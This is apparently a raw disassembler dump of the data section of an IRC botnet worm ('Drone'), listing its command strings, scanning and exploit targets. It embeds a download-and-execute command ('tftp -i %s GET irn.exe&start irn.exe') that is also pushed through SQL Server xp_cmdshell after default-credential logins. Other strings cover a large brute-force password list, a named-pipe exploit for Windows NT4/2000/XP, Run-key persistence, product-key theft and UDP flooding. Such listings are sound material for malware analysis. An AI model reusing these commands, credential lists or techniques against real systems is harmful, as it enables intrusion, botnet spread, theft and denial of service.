aAtan2		db 'atan2',0
		align 10h
aTanh		db 'tanh',0
		align 4
aCosh		db 'cosh',0
		align 10h
aSinh		db 'sinh',0
		align 4
dbl_41FE38	dq 0.0			; DATA XREF: sub_4100E0+143r
aSunmontuewedth	db 'SunMonTueWedThuFriSat',0
		align 4
aJanfebmaraprma	db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
		align 10h
aE000		db 'e+000',0            ; DATA XREF: sub_411014:loc_4110ECo
		align 4
dbl_41FE88	dq 4.195835e6		; DATA XREF: sub_411954+Fr
dbl_41FE90	dq 3.145727e6		; DATA XREF: sub_411954+6r
aIsprocessorfea	db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_411990+Fo
		align 4
aKernel32	db 'KERNEL32',0         ; DATA XREF: sub_411990o
		align 10h
aConout		db 'CONOUT$',0          ; DATA XREF: sub_4119EB+Eo
a1Qnan		db '1#QNAN',0           ; DATA XREF: sub_413071:loc_4131A0o
		align 10h
a1Inf		db '1#INF',0            ; DATA XREF: sub_413071+103o
		align 4
a1Ind		db '1#IND',0            ; DATA XREF: sub_413071+F4o
		align 10h
a1Snan		db '1#SNAN',0           ; DATA XREF: sub_413071+DCo
		align 4
aBadAllocation	db 'bad allocation',0   ; DATA XREF: .data:00425520o
		align 4
aScan_start	db 'scan.start',0       ; DATA XREF: .text:0041D160o
		align 4
aScan_stop	db 'scan.stop',0        ; DATA XREF: .text:0041D17Co
byte_41FF0E	db 0			; DATA XREF: sub_41B3E7+9Co
byte_41FF0F	db 0			; DATA XREF: sub_41B3E7+A8o
dword_41FF10	dd 6E616373h, 6174732Eh, 7374h ; DATA XREF: .text:0041D198o
dword_41FF1C	dd 252E6425h, 64252E64h, 64252Eh ; DATA	XREF: sub_413FED+4Ao
byte_41FF28	db 25h,	73h, 0		; DATA XREF: sub_413FED+18Co
		db 0			; DATA XREF: .data:off_426830o
byte_41FF2C	db 25h,	73h, 0		; DATA XREF: sub_413FED+28Eo
byte_41FF2F	db 0			; DATA XREF: sub_41C4C0+1DDo
dword_41FF30	dd 7325h		; DATA XREF: sub_413FED+36Ao
dword_41FF34	dd 7325h, 20646162h, 6F6C6C61h,	69746163h, 6E6Fh
					; DATA XREF: sub_413FED+479o
					; .data:00425524o
aTftpISGetIrn_e	db 'tftp -i %s GET irn.exe&start irn.exe&exit',0Dh,0Ah,0
					; DATA XREF: sub_41AFC1+EFo
aBadAllocatio_0	db 'bad allocation',0   ; DATA XREF: .data:004255D8o
		align 4
aBadAllocatio_1	db 'bad allocation',0   ; DATA XREF: .data:004255DCo
		align 4
aWindowsNt42000	db 'Windows NT4, 2000 (SP0-SP4)',0
aWindowsXpSp0Sp	db 'Windows XP (SP0+SP1)',0 ; DATA XREF: .data:00426814o
		align 4
		dd offset dword_49005C
		dd offset dword_430050
		dd 24h,	5C005Ch, 3 dup(0)
		dd offset dword_49005C
		dd offset dword_430050
		dd 24h,	5C005Ch, 0
dword_41FFF8	dd 2Eh			; DATA XREF: sub_41B3E7+57o
dword_41FFFC	dd 73255C5Ch, 6370695Ch, 24h ; DATA XREF: sub_41B3E7+76o
aSPipeBrowser	db '\\%s\pipe\browser',0 ; DATA XREF: sub_41B3E7+CAo
		align 4
dword_42001C	dd 4B324FC8h, 1D31670h,	475A7812h, 88E16EBFh, 0	; DATA XREF: sub_41B3E7+191o
dword_420030	dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 3 dup(0)
					; DATA XREF: sub_41B3E7+1ACo
; ---------------------------------------------------------------------------
		jmp	short near ptr dword_420050
; ---------------------------------------------------------------------------
		align 10h
dword_420050	dd 0			; CODE XREF: zcrshv4o:0042004Cj
aHttpSDS_0	db 'http://%s:%d/%s',0  ; DATA XREF: sub_41B3E7+3C6o
aSExploitedS_	db '%s: Exploited: %s.',0 ; DATA XREF: sub_41B3E7+6FBo
		align 4
aBadAllocatio_2	db 'bad allocation',0   ; DATA XREF: .data:00426828o
		align 4
aSa		db 'sa',0               ; DATA XREF: sub_41BB1E+55o
		align 4
aRoot		db 'root',0             ; DATA XREF: sub_41BB1E+5Co
		align 4
aAdmin		db 'admin',0            ; DATA XREF: sub_41BB1E+63o
		align 4
aDriverSqlServe	db 'DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s',0
					; DATA XREF: sub_41BB1E+10Co
		align 10h
; aExecMaster(long long, *)
aExecMaster__xp	db 'EXEC master..xp_cmdshell ',27h,'tftp -i %s GET irn.exe&start irn.exe'
					; DATA XREF: sub_41BB1E+197o
		db '&exit',0Dh,0Ah
		db 27h,0
		align 4
aSExploitedS__0	db '%s: Exploited %s.',0 ; DATA XREF: sub_41BB1E+1F1o
		align 4
aAdministrator	db 'administrator',0    ; DATA XREF: .data:00426834o
		align 4
aAdministrador	db 'administrador',0    ; DATA XREF: .data:00426838o
		align 4
aAdministrateur	db 'administrateur',0   ; DATA XREF: .data:0042683Co
		align 4
aAdministrat	db 'administrat',0      ; DATA XREF: .data:00426840o
aAdmins		db 'admins',0           ; DATA XREF: .data:00426844o
		align 10h
aAdmin_0	db 'admin',0            ; DATA XREF: .data:00426848o
		align 4
aAdm		db 'adm',0              ; DATA XREF: .data:0042684Co
aPassword1	db 'password1',0        ; DATA XREF: .data:00426850o
		align 4
aPassword	db 'password',0         ; DATA XREF: .data:00426854o
		align 4
aPasswd		db 'passwd',0           ; DATA XREF: .data:00426858o
		align 4
aPass1234	db 'pass1234',0         ; DATA XREF: .data:0042685Co
		align 4
aPass		db 'pass',0             ; DATA XREF: .data:00426860o
		align 10h
aPwd		db 'pwd',0              ; DATA XREF: .data:00426864o
a007		db '007',0              ; DATA XREF: .data:00426868o
a1:					; DATA XREF: .data:0042686Co
		unicode	0, <1>,0
a12		db '12',0               ; DATA XREF: .data:00426870o
		align 10h
a123		db '123',0              ; DATA XREF: .data:00426874o
a1234		db '1234',0             ; DATA XREF: .data:00426878o
		align 4
a12345		db '12345',0            ; DATA XREF: .data:0042687Co
		align 4
a123456		db '123456',0           ; DATA XREF: .data:00426880o
		align 4
a1234567	db '1234567',0          ; DATA XREF: .data:00426884o
a12345678	db '12345678',0         ; DATA XREF: .data:00426888o
		align 10h
a123456789	db '123456789',0        ; DATA XREF: .data:0042688Co
		align 4
a1234567890	db '1234567890',0       ; DATA XREF: .data:00426890o
		align 4
a2000		db '2000',0             ; DATA XREF: .data:00426894o
		align 10h
a2001		db '2001',0             ; DATA XREF: .data:00426898o
		align 4
a2002		db '2002',0             ; DATA XREF: .data:0042689Co
		align 10h
a2003		db '2003',0             ; DATA XREF: .data:004268A0o
		align 4
a2004		db '2004',0             ; DATA XREF: .data:004268A4o
		align 10h
aTest		db 'test',0             ; DATA XREF: .data:004268A8o
		align 4
aGuest		db 'guest',0            ; DATA XREF: .data:004268ACo
		align 10h
aNone		db 'none',0             ; DATA XREF: .data:004268B0o
		align 4
aDemo		db 'demo',0             ; DATA XREF: .data:004268B4o
		align 10h
aUnix		db 'unix',0             ; DATA XREF: .data:004268B8o
		align 4
aLinux		db 'linux',0            ; DATA XREF: .data:004268BCo
		align 10h
aChangeme	db 'changeme',0         ; DATA XREF: .data:004268C0o
		align 4
aDefault	db 'default',0          ; DATA XREF: .data:004268C4o
aSystem_0	db 'system',0           ; DATA XREF: .data:004268C8o
		align 4
aServer		db 'server',0           ; DATA XREF: .data:004268CCo
		align 4
aRoot_0		db 'root',0             ; DATA XREF: .data:004268D0o
		align 4
aNull_1		db 'null',0             ; DATA XREF: .data:004268D4o
		align 4
aQwerty		db 'qwerty',0           ; DATA XREF: .data:004268D8o
		align 4
aMail		db 'mail',0             ; DATA XREF: .data:004268DCo
		align 4
aOutlook	db 'outlook',0          ; DATA XREF: .data:004268E0o
aWeb		db 'web',0              ; DATA XREF: .data:004268E4o
aWww		db 'www',0              ; DATA XREF: .data:004268E8o
aInternet	db 'internet',0         ; DATA XREF: .data:004268ECo
		align 10h
aAccounts	db 'accounts',0         ; DATA XREF: .data:004268F0o
		align 4
aAccounting	db 'accounting',0       ; DATA XREF: .data:004268F4o
		align 4
aHome		db 'home',0             ; DATA XREF: .data:004268F8o
		align 10h
aHomeuser	db 'homeuser',0         ; DATA XREF: .data:004268FCo
		align 4
aUser		db 'user',0             ; DATA XREF: .data:00426900o
		align 4
aOem		db 'oem',0              ; DATA XREF: .data:00426904o
aOemuser	db 'oemuser',0          ; DATA XREF: .data:00426908o
aOeminstall	db 'oeminstall',0       ; DATA XREF: .data:0042690Co
		align 4
aWindows	db 'windows',0          ; DATA XREF: .data:00426910o
aWin98		db 'win98',0            ; DATA XREF: .data:00426914o
		align 4
aWin2k		db 'win2k',0            ; DATA XREF: .data:00426918o
		align 4
aWinxp		db 'winxp',0            ; DATA XREF: .data:0042691Co
		align 4
aWinnt		db 'winnt',0            ; DATA XREF: .data:00426920o
		align 4
aWin2000	db 'win2000',0          ; DATA XREF: .data:00426924o
aQaz		db 'qaz',0              ; DATA XREF: .data:00426928o
aAsd		db 'asd',0              ; DATA XREF: .data:0042692Co
aZxc		db 'zxc',0              ; DATA XREF: .data:00426930o
aQwe		db 'qwe',0              ; DATA XREF: .data:00426934o
aBob		db 'bob',0              ; DATA XREF: .data:00426938o
aJen		db 'jen',0              ; DATA XREF: .data:0042693Co
aJoe		db 'joe',0              ; DATA XREF: .data:00426940o
aFred		db 'fred',0             ; DATA XREF: .data:00426944o
		align 10h
aBill		db 'bill',0             ; DATA XREF: .data:00426948o
		align 4
aMike		db 'mike',0             ; DATA XREF: .data:0042694Co
		align 10h
aJohn		db 'john',0             ; DATA XREF: .data:00426950o
		align 4
aPeter		db 'peter',0            ; DATA XREF: .data:00426954o
		align 10h
aLuke		db 'luke',0             ; DATA XREF: .data:00426958o
		align 4
aSam		db 'sam',0              ; DATA XREF: .data:0042695Co
aSue		db 'sue',0              ; DATA XREF: .data:00426960o
aSusan		db 'susan',0            ; DATA XREF: .data:00426964o
		align 4
aPeter_0	db 'peter',0            ; DATA XREF: .data:00426968o
		align 10h
aBrian		db 'brian',0            ; DATA XREF: .data:0042696Co
		align 4
aLee		db 'lee',0              ; DATA XREF: .data:00426970o
aNeil		db 'neil',0             ; DATA XREF: .data:00426974o
		align 4
aIan		db 'ian',0              ; DATA XREF: .data:00426978o
aChris		db 'chris',0            ; DATA XREF: .data:0042697Co
		align 10h
aEric		db 'eric',0             ; DATA XREF: .data:00426980o
		align 4
aGeorge		db 'george',0           ; DATA XREF: .data:00426984o
		align 10h
aKate		db 'kate',0             ; DATA XREF: .data:00426988o
		align 4
aBob_0		db 'bob',0              ; DATA XREF: .data:0042698Co
aKatie		db 'katie',0            ; DATA XREF: .data:00426990o
		align 4
aMary		db 'mary',0             ; DATA XREF: .data:00426994o
		align 4
aLogin		db 'login',0            ; DATA XREF: .data:00426998o
		align 4
aLoginpass	db 'loginpass',0        ; DATA XREF: .data:0042699Co
		align 10h
aTechnical	db 'technical',0        ; DATA XREF: .data:004269A0o
		align 4
aBackup		db 'backup',0           ; DATA XREF: .data:004269A4o
		align 4
aExchange	db 'exchange',0         ; DATA XREF: .data:004269A8o
		align 10h
aFuck		db 'fuck',0             ; DATA XREF: .data:004269ACo
		align 4
aBitch		db 'bitch',0            ; DATA XREF: .data:004269B0o
		align 10h
aSlut		db 'slut',0             ; DATA XREF: .data:004269B4o
		align 4
aSex		db 'sex',0              ; DATA XREF: .data:004269B8o
aGod		db 'god',0              ; DATA XREF: .data:004269BCo
aHell		db 'hell',0             ; DATA XREF: .data:004269C0o
		align 4
aHello		db 'hello',0            ; DATA XREF: .data:004269C4o
		align 10h
aDomain		db 'domain',0           ; DATA XREF: .data:004269C8o
		align 4
aDomainpass	db 'domainpass',0       ; DATA XREF: .data:004269CCo
		align 4
aDomainpassword	db 'domainpassword',0   ; DATA XREF: .data:004269D0o
		align 4
aDatabase	db 'database',0         ; DATA XREF: .data:004269D4o
		align 10h
aAccess		db 'access',0           ; DATA XREF: .data:004269D8o
		align 4
aDbpass		db 'dbpass',0           ; DATA XREF: .data:004269DCo
		align 10h
aDbpassword	db 'dbpassword',0       ; DATA XREF: .data:004269E0o
		align 4
aDatabasepass	db 'databasepass',0     ; DATA XREF: .data:004269E4o
		align 4
aData		db 'data',0             ; DATA XREF: .data:004269E8o
		align 4
aDatabasepasswo	db 'databasepassword',0 ; DATA XREF: .data:004269ECo
		align 4
aDb1		db 'db1',0              ; DATA XREF: .data:004269F0o
aDb2		db 'db2',0              ; DATA XREF: .data:004269F4o
aDb1234		db 'db1234',0           ; DATA XREF: .data:004269F8o
		align 4
aSa_0		db 'sa',0               ; DATA XREF: .data:004269FCo
		align 4
aSql		db 'sql',0              ; DATA XREF: .data:00426A00o
aSqlpassoainsta	db 'sqlpassoainstall',0 ; DATA XREF: .data:00426A04o
		align 4
aOrainstall	db 'orainstall',0       ; DATA XREF: .data:00426A08o
		align 10h
aOracle		db 'oracle',0           ; DATA XREF: .data:00426A0Co
		align 4
aIbm		db 'ibm',0              ; DATA XREF: .data:00426A10o
aCisco		db 'cisco',0            ; DATA XREF: .data:00426A14o
		align 4
aDell		db 'dell',0             ; DATA XREF: .data:00426A18o
		align 4
aCompaq		db 'compaq',0           ; DATA XREF: .data:00426A1Co
		align 4
aSiemens	db 'siemens',0          ; DATA XREF: .data:00426A20o
aHp		db 'hp',0               ; DATA XREF: .data:00426A24o
		align 10h
aNokia		db 'nokia',0            ; DATA XREF: .data:00426A28o
		align 4
aXp		db 'xp',0               ; DATA XREF: .data:00426A2Co
		align 4
aControl	db 'control',0          ; DATA XREF: .data:00426A30o
aOffice		db 'office',0           ; DATA XREF: .data:00426A34o
		align 4
aBlank		db 'blank',0            ; DATA XREF: .data:00426A38o
		align 4
aWinpass	db 'winpass',0          ; DATA XREF: .data:00426A3Co
aMain		db 'main',0             ; DATA XREF: .data:00426A40o
		align 4
aLan		db 'lan',0              ; DATA XREF: .data:00426A44o
aInternet_0	db 'internet',0         ; DATA XREF: .data:00426A48o
		align 4
aIntranet	db 'intranet',0         ; DATA XREF: .data:00426A4Co
		align 10h
aStudent	db 'student',0          ; DATA XREF: .data:00426A50o
aTeacher	db 'teacher',0          ; DATA XREF: .data:00426A54o
aStaff		db 'staff',0            ; DATA XREF: .data:00426A58o
		align 4
aBadAllocatio_3	db 'bad allocation',0   ; DATA XREF: .data:0042682Co
		align 4
aUdp		db 'udp',0              ; DATA XREF: .text:0041D136o
aUdpErrorSendin	db 'UDP: Error Sending UDP Packets to %s',0 ; DATA XREF: sub_41C2A3+85o
		align 4
aUdpSendingUdpP	db 'UDP: Sending UDP Packets to %s',0 ; DATA XREF: sub_41C2A3+97o
		align 4
aUdpFinishedSen	db 'UDP: Finished Sending UDP Packets to %s',0 ; DATA XREF: sub_41C2A3+1D9o
aBadAllocatio_4	db 'bad allocation',0   ; DATA XREF: .data:00426A60o
		align 4
aHardwareDescri	db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
					; DATA XREF: sub_41B1B7+21o
		align 4
aMhz		db '~MHz',0             ; DATA XREF: sub_41B1B7+4Ao
		align 4
aProcessornames	db 'ProcessorNameString',0 ; DATA XREF: sub_41B1B7+6Do
aS_8		db '%s',0               ; DATA XREF: sub_41B1B7+ADo
		align 4
aSC_0		db '%s%c',0             ; DATA XREF: sub_41B1B7+112o
		align 4
aUnknown	db 'Unknown',0          ; DATA XREF: sub_41B1B7+165o
aHardwareDesc_0	db 'HARDWARE\DESCRIPTION\System\CentralProcessor\%i',0
					; DATA XREF: sub_41B1B7+1B7o
aSysinfo	db 'sysinfo',0          ; DATA XREF: .text:0041D0FEo
aNetinfo	db 'netinfo',0          ; DATA XREF: .text:0041D11Ao
aBadAllocatio_5	db 'bad allocation',0   ; DATA XREF: .data:00426A64o
		align 4
aS4		db 's4',0               ; DATA XREF: .text:0041D0C6o
		align 10h
aS4_stop	db 's4.stop',0          ; DATA XREF: .text:0041D0E2o
aS4SocketError	db 'S4: socket() Error',0
		align 4
aS4BindError	db 'S4: bind() Error',0 ; DATA XREF: sub_4147B2+A8o
		align 10h
aS4ListenError	db 'S4: listen() Error',0 ; DATA XREF: sub_4147B2+C1o
		align 4
aS4SI		db 'S4: %s:%i',0        ; DATA XREF: sub_4147B2+132o
		align 10h
aSc		db 'SC',0               ; DATA XREF: sub_4147B2+18Eo
		align 4
aBadAllocatio_6	db 'bad allocation',0   ; DATA XREF: .data:00426A68o
		align 4
aUptime		db 'uptime',0           ; DATA XREF: .text:0041D072o
		align 4
aHttp		db 'http',0             ; DATA XREF: .text:0041D08Eo
		align 4
aCdkey		db 'cdkey',0            ; DATA XREF: .text:0041D0AAo
		align 4
aB_0:					; DATA XREF: sub_414954+51o
		unicode	0, <B>,0
aC_0:					; DATA XREF: sub_414954+58o
		unicode	0, <C>,0
aD:					; DATA XREF: sub_414954+5Fo
		unicode	0, <D>,0
aF:					; DATA XREF: sub_414954+66o
		unicode	0, <F>,0
aG:					; DATA XREF: sub_414954+6Do
		unicode	0, <G>,0
asc_420770:				; DATA XREF: sub_414954+74o
		unicode	0, <H>,0
aJ:					; DATA XREF: sub_414954+7Bo
		unicode	0, <J>,0
aK:					; DATA XREF: sub_414954+82o
		unicode	0, <K>,0
aM:					; DATA XREF: sub_414954+89o
		unicode	0, <M>,0
aP:					; DATA XREF: sub_414954+90o
		unicode	0, <P>,0
aQ:					; DATA XREF: sub_414954+97o
		unicode	0, <Q>,0
aR:					; DATA XREF: sub_414954+9Eo
		unicode	0, <R>,0
aT:					; DATA XREF: sub_414954+A5o
		unicode	0, <T>,0
aV:					; DATA XREF: sub_414954+ACo
		unicode	0, <V>,0
aW_0:					; DATA XREF: sub_414954+B3o
		unicode	0, <W>,0
asc_420798:				; DATA XREF: sub_414954+BAo
		unicode	0, <X>,0
aY:					; DATA XREF: sub_414954+C1o
		unicode	0, <Y>,0
a2:					; DATA XREF: sub_414954+C8o
		unicode	0, <2>,0
a3:					; DATA XREF: sub_414954+CFo
		unicode	0, <3>,0
a4:					; DATA XREF: sub_414954+D6o
		unicode	0, <4>,0
a6:					; DATA XREF: sub_414954+DDo
		unicode	0, <6>,0
a7:					; DATA XREF: sub_414954+E4o
		unicode	0, <7>,0
a8:					; DATA XREF: sub_414954+EBo
		unicode	0, <8>,0
a9:					; DATA XREF: sub_414954+F2o
		unicode	0, <9>,0
aSoftwareMicros	db 'SOFTWARE\MICROSOFT\Windows NT\CurrentVersion',0
					; DATA XREF: sub_414954+47o
		align 4
aDigitalproduct	db 'DigitalProductId',0 ; DATA XREF: sub_414954+13Ao
		align 10h
asc_420800:				; DATA XREF: sub_414954+20Do
		unicode	0, <->,0
aS		db '%s',0               ; DATA XREF: sub_414954+22Bo
		align 4
aBadAllocatio_7	db 'bad allocation',0   ; DATA XREF: .data:00426A6Co
		align 4
aI_quit		db 'i.quit',0           ; DATA XREF: .text:0041D01Eo
		align 10h
aI_join		db 'i.join',0           ; DATA XREF: .text:0041D03Ao
		align 4
aI_part		db 'i.part',0           ; DATA XREF: .text:0041D056o
		align 10h
aBadAllocatio_8	db 'bad allocation',0   ; DATA XREF: .data:00426A70o
		align 10h
aDownload	db 'download',0         ; DATA XREF: .text:0041CFE6o
		align 4
aUpdate		db 'update',0           ; DATA XREF: .text:0041D002o
		align 4
aMozilla5_0	db 'Mozilla/5.0',0      ; DATA XREF: sub_41C4C0+33o
aDlDownloadingS	db 'DL: Downloading %s to %s',0 ; DATA XREF: sub_41C4C0+51o
		align 4
aDlFailedBadLoc	db 'DL: Failed; Bad Location.',0 ; DATA XREF: sub_41C4C0:loc_41C68Ao
		align 4
aDlDownloadSIBy	db 'DL: Download %s (%i Bytes) finished in %i seconds (%iKB/s)',0
					; DATA XREF: sub_41C4C0+156o
		align 4
aMainUninstalli	db 'Main: Uninstalling Drone',0 ; DATA XREF: sub_41C4C0+1A7o
		align 10h
aDlFailedToUpda	db 'DL: Failed To Update',0 ; DATA XREF: sub_41C4C0:loc_41C691o
		align 4
aDlErrorExecuti	db 'DL: Error Executing File.',0 ; DATA XREF: sub_41C4C0+1EDo
		align 4
aDlExecutedFile	db 'DL: Executed File: %s',0 ; DATA XREF: sub_41C4C0+1FCo
		align 4
aDlFailedBadUrl	db 'DL: Failed; Bad URL',0 ; DATA XREF: sub_41C4C0:loc_41C6D8o
aDlFailedWinine	db 'DL: Failed; WinINET Error',0 ; DATA XREF: sub_41C4C0:loc_41C6DFo
		align 4
aBadAllocatio_9	db 'bad allocation',0   ; DATA XREF: .data:00426A74o
		align 4
aBadAllocati_10	db 'bad allocation',0   ; DATA XREF: .data:00426A78o
		align 4
aTftpServer	db 'TFTP Server',0      ; DATA XREF: sub_41C0F3+5Ao
aRb		db 'rb',0               ; DATA XREF: sub_41BD4E+44o
		align 4
aTftpSendComple	db 'TFTP: Send Complete To %s. %d Total Sends',0
					; DATA XREF: sub_41BD4E+1A4o
		align 4
aBadAllocati_11	db 'bad allocation',0   ; DATA XREF: .data:00426A7Co
		align 4
		dd 428A2F98h, 71374491h, 0B5C0FBCFh, 0E9B5DBA5h, 3956C25Bh
		dd 59F111F1h, 923F82A4h, 0AB1C5ED5h, 0D807AA98h, 12835B01h
		dd 243185BEh, 550C7DC3h, 72BE5D74h, 80DEB1FEh, 9BDC06A7h
		dd 0C19BF174h, 0E49B69C1h, 0EFBE4786h, 0FC19DC6h, 240CA1CCh
		dd 2DE92C6Fh, 4A7484AAh, 5CB0A9DCh, 76F988DAh, 983E5152h
		dd 0A831C66Dh, 0B00327C8h, 0BF597FC7h, 0C6E00BF3h, 0D5A79147h
		dd 6CA6351h, 14292967h,	27B70A85h, 2E1B2138h, 4D2C6DFCh
		dd 53380D13h, 650A7354h, 766A0ABBh, 81C2C92Eh, 92722C85h
		dd 0A2BFE8A1h, 0A81A664Bh, 0C24B8B70h, 0C76C51A3h, 0D192E819h
		dd 0D6990624h, 0F40E3585h, 106AA070h, 19A4C116h, 1E376C08h
		dd 2748774Ch, 34B0BCB5h, 391C0CB3h, 4ED8AA4Ah, 5B9CCA4Fh
		dd 682E6FF3h, 748F82EEh, 78A5636Fh, 84C87814h, 8CC70208h
		dd 90BEFFFAh, 0A4506CEBh, 0BEF9A3F7h, 0C67178F2h, 6A09E667h
		dd 0BB67AE85h, 3C6EF372h, 0A54FF53Ah, 510E527Fh, 9B05688Ch
		dd 1F83D9ABh, 5BE0CD19h
dword_420AF8	dd 0D728AE22h		; DATA XREF: sub_415050+318r
dword_420AFC	dd 428A2F98h		; DATA XREF: sub_415050+31Fr
dword_420B00	dd 23EF65CDh		; DATA XREF: sub_415050+548r
dword_420B04	dd 71374491h		; DATA XREF: sub_415050+54Fr
dword_420B08	dd 0EC4D3B2Fh		; DATA XREF: sub_415050+772r
dword_420B0C	dd 0B5C0FBCFh		; DATA XREF: sub_415050+779r
dword_420B10	dd 8189DBBCh		; DATA XREF: sub_415050+9B8r
dword_420B14	dd 0E9B5DBA5h		; DATA XREF: sub_415050+9BFr
dword_420B18	dd 0F348B538h		; DATA XREF: sub_415050+BFEr
dword_420B1C	dd 3956C25Bh		; DATA XREF: sub_415050+C09r
dword_420B20	dd 0B605D019h		; DATA XREF: sub_415050+E80r
dword_420B24	dd 59F111F1h		; DATA XREF: sub_415050+E87r
dword_420B28	dd 0AF194F9Bh		; DATA XREF: sub_415050+10D7r
dword_420B2C	dd 923F82A4h		; DATA XREF: sub_415050+10DEr
dword_420B30	dd 0DA6D8118h		; DATA XREF: sub_415050+1319r
dword_420B34	dd 0AB1C5ED5h		; DATA XREF: sub_415050+1320r
dword_420B38	dd 0A3030242h		; DATA XREF: sub_415050+1569r
dword_420B3C	dd 0D807AA98h		; DATA XREF: sub_415050+1570r
dword_420B40	dd 45706FBEh		; DATA XREF: sub_415050+17ABr
dword_420B44	dd 12835B01h		; DATA XREF: sub_415050+17B2r
dword_420B48	dd 4EE4B28Ch		; DATA XREF: sub_415050+19F3r
dword_420B4C	dd 243185BEh		; DATA XREF: sub_415050+19FAr
dword_420B50	dd 0D5FFB4E2h		; DATA XREF: sub_415050+1C39r
dword_420B54	dd 550C7DC3h		; DATA XREF: sub_415050+1C40r
dword_420B58	dd 0F27B896Fh		; DATA XREF: sub_415050+1E91r
dword_420B5C	dd 72BE5D74h		; DATA XREF: sub_415050+1E9Cr
dword_420B60	dd 3B1696B1h		; DATA XREF: sub_415050+210Dr
dword_420B64	dd 80DEB1FEh		; DATA XREF: sub_415050+2114r
dword_420B68	dd 25C71235h		; DATA XREF: sub_415050+236Ar
dword_420B6C	dd 9BDC06A7h		; DATA XREF: sub_415050+2371r
dword_420B70	dd 0CF692694h		; DATA XREF: sub_415050+25B8r
dword_420B74	dd 0C19BF174h		; DATA XREF: sub_415050+25BFr
		dd 9EF14AD2h, 0E49B69C1h, 384F25E3h, 0EFBE4786h, 8B8CD5B5h
		dd 0FC19DC6h, 77AC9C65h, 240CA1CCh, 592B0275h, 2DE92C6Fh
		dd 6EA6E483h, 4A7484AAh, 0BD41FBD4h, 5CB0A9DCh,	831153B5h
		dd 76F988DAh, 0EE66DFABh, 983E5152h, 2DB43210h,	0A831C66Dh
		dd 98FB213Fh, 0B00327C8h, 0BEEF0EE4h, 0BF597FC7h, 3DA88FC2h
		dd 0C6E00BF3h, 930AA725h, 0D5A79147h, 0E003826Fh, 6CA6351h
		dd 0A0E6E70h, 14292967h, 46D22FFCh, 27B70A85h, 5C26C926h
		dd 2E1B2138h, 5AC42AEDh, 4D2C6DFCh, 9D95B3DFh, 53380D13h
		dd 8BAF63DEh, 650A7354h, 3C77B2A8h, 766A0ABBh, 47EDAEE6h
		dd 81C2C92Eh, 1482353Bh, 92722C85h, 4CF10364h, 0A2BFE8A1h
		dd 0BC423001h, 0A81A664Bh, 0D0F89791h, 0C24B8B70h, 654BE30h
		dd 0C76C51A3h, 0D6EF5218h, 0D192E819h, 5565A910h, 0D6990624h
		dd 5771202Ah, 0F40E3585h, 32BBD1B8h, 106AA070h,	0B8D2D0C8h
		dd 19A4C116h, 5141AB53h, 1E376C08h, 0DF8EEB99h,	2748774Ch
		dd 0E19B48A8h, 34B0BCB5h, 0C5C95A63h, 391C0CB3h, 0E3418ACBh
		dd 4ED8AA4Ah, 7763E373h, 5B9CCA4Fh, 0D6B2B8A3h,	682E6FF3h
		dd 5DEFB2FCh, 748F82EEh, 43172F60h, 78A5636Fh, 0A1F0AB72h
		dd 84C87814h, 1A6439ECh, 8CC70208h, 23631E28h, 90BEFFFAh
		dd 0DE82BDE9h, 0A4506CEBh, 0B2C67915h, 0BEF9A3F7h, 0E372532Bh
		dd 0C67178F2h, 0EA26619Ch, 0CA273ECEh, 21C0C207h, 0D186B8C7h
		dd 0CDE0EB1Eh, 0EADA7DD6h, 0EE6ED178h, 0F57D4F7Fh, 72176FBAh
		dd 6F067AAh, 0A2C898A6h, 0A637DC5h, 0BEF90DAEh,	113F9804h
		dd 131C471Bh, 1B710B35h, 23047D84h, 28DB77F5h, 40C72493h
		dd 32CAAB7Bh, 15C9BEBCh, 3C9EBE0Ah, 9C100D4Ch, 431D67C4h
		dd 0CB3E42B6h, 4CC5D4BEh, 0FC657E2Ah, 597F299Ch, 3AD6FAECh
		dd 5FCB6FABh, 4A475817h, 6C44198Ch, 0C1059ED8h,	0CBBB9D5Dh
		dd 367CD507h, 629A292Ah, 3070DD17h, 9159015Ah, 0F70E5939h
		dd 152FECD8h, 0FFC00B31h, 67332667h, 68581511h,	8EB44A87h
		dd 64F98FA7h, 0DB0C2E0Dh, 0BEFA4FA4h, 47B5481Dh, 90h dup(0)
byte_420FF8	db 8, 0C9h		; DATA XREF: sub_415020+17o
; ---------------------------------------------------------------------------
		mov	esp, 9E667F3h
		push	3Bh
		cmpsd
		retf	8584h
; ---------------------------------------------------------------------------
		db 0AEh, 67h, 0BBh
		dd 0FE94F82Bh, 3C6EF372h, 5F1D36F1h, 0A54FF53Ah, 0ADE682D1h
		dd 510E527Fh, 2B3E6C1Fh, 9B05688Ch, 0FB41BD6Bh,	1F83D9ABh
		dd 137E2179h, 5BE0CD19h, 90h dup(0)
dword_421278	dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 20646162h, 6F6C6C61h
		dd 69746163h, 6E6Fh
dword_421298	dd 255C7325h, 73h	; DATA XREF: sub_417C06+DCo
aSoftwareMicr_0	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_417C06+10Co
		align 10h
aSoftwareMicr_1	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_417C06+14Fo
		align 10h
aSS_3		db '%s\%s',0            ; DATA XREF: sub_417D99+BAo
		align 4
aSoftwareMicr_2	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_417D99+F9o
		align 4
aSoftwareMicr_3	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_417D99+14Do
		align 4
aBadAllocati_12	db 'bad allocation',0   ; DATA XREF: .data:00426C2Co
		align 4
aInstall	db '--install ',0       ; DATA XREF: sub_41C77E:loc_41C7BEo
		align 4
aSS_6		db '%s\%s',0            ; DATA XREF: sub_41C77E+EEo
		align 4
aSSS_0		db '%s %s%s',0          ; DATA XREF: sub_41C77E+1BCo
aS_12		db '%s',0               ; DATA XREF: sub_41C77E+24Eo
		align 4
aRm		db 'RM',0               ; DATA XREF: sub_41C77E+322o
		align 4
aBk		db 'BK',0               ; DATA XREF: sub_41C77E+35Bo
		align 10h
aUnm		db 'UNM',0              ; DATA XREF: sub_41C77E+380o
aBadAllocati_13	db 'bad allocation',0   ; DATA XREF: .data:00427C0Co
		align 4
aSS_7		db '%s %s',0Dh,0Ah,0    ; DATA XREF: sub_418F1C+42o
